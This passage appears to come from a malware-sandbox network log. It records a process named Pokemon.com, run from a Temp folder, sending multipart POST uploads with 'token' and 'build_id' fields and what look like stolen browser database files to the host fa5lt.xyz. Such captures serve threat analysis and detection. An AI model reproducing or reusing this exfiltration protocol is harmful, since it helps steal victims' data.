                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:10 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:10 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:10 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                    Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:10 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:10 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:10 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:10 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:11 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    15192.168.2.549859116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:11 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----A1N7QQQQ1DJE3EK6FKFK
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 493
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:11 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 41 31 4e 37 51 51 51 51 31 44 4a 45 33 45 4b 36 46 4b 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 41 31 4e 37 51 51 51 51 31 44 4a 45 33 45 4b 36 46 4b 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 41 31 4e 37 51 51 51 51 31 44 4a 45 33 45 4b 36 46 4b 46 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------A1N7QQQQ1DJE3EK6FKFKContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------A1N7QQQQ1DJE3EK6FKFKContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------A1N7QQQQ1DJE3EK6FKFKCont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:12 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    16192.168.2.549881116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:17 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----JE37GLXT00ZMYMOZCJWL
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 509
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:17 UTC509OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 33 37 47 4c 58 54 30 30 5a 4d 59 4d 4f 5a 43 4a 57 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 37 47 4c 58 54 30 30 5a 4d 59 4d 4f 5a 43 4a 57 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 37 47 4c 58 54 30 30 5a 4d 59 4d 4f 5a 43 4a 57 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------JE37GLXT00ZMYMOZCJWLContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------JE37GLXT00ZMYMOZCJWLContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------JE37GLXT00ZMYMOZCJWLCont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:18 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    17192.168.2.549893116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:19 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----C2VKNG4E3W47YMGLXB1N
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 207993
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:19 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 47 34 45 33 57 34 37 59 4d 47 4c 58 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 47 34 45 33 57 34 37 59 4d 47 4c 58 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 47 34 45 33 57 34 37 59 4d 47 4c 58 42 31 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------C2VKNG4E3W47YMGLXB1NContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------C2VKNG4E3W47YMGLXB1NContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------C2VKNG4E3W47YMGLXB1NCont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
